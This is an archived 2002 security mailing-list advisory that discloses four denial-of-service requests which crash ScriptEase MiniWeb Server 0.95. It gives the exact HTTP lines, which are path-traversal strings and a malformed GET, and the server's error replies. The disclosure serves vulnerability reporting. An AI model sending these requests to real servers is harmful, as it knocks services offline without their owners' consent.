The following are four more Server Denial of Service Attacks against ScriptEase MiniWeb Server 0.95. These attacks do not make the server point to an invalid memory address like the previous post. I believe the first two attacks I describe are internal server problems due to either coding errors or incomplete coding. The second two may just be configuration problems on my part, as this assessment was done fairly quickly. After we receieve "Press a key..." on the server side, the server stops and needs to be manually restarted. Thanks to Tamer Sahin for his earlier post. (http://www.securityfocus.com/archive/1/257031) Cheers, 'ken'@FTU <--------------- BOF -------------> Dos One. We Send: GET /%2e%2e/ HTTP/1.0 ScriptEase Internal Server Reply: 1512: Cannot compare variable of different dimension. Press a key... ======= Dos Two. We Send: GET /../../../../../../../../../ HTTP/1.0 ScriptEase Internal Server Reply: 1512: Cannot compare variable of different dimension. Press a key... ======= Dos Three. We Send: GET HTTP/1.0 ScriptEase Internal Server Reply: 5108: Invalid VA_LIST. Press a key... ======= Dos Four. We Send: GET ../../../../../../../../../../ HTTP/1.0 ScriptEase Internal Server Reply: 5108: Invalid VA_LIST. Press a key... <--------------- EOF -------------> -- "I grew convinced that truth, sincerity and integrity in dealings between man and man were of the utmost importance to the felicity of life, and I formed a written resolution to practise them ever while I lived." -Benjamin Franklin, The Autobiography of Benjamin Franklin
This archive was generated by hypermail 2b30 : Wed Feb 20 2002 - 16:55:46 PST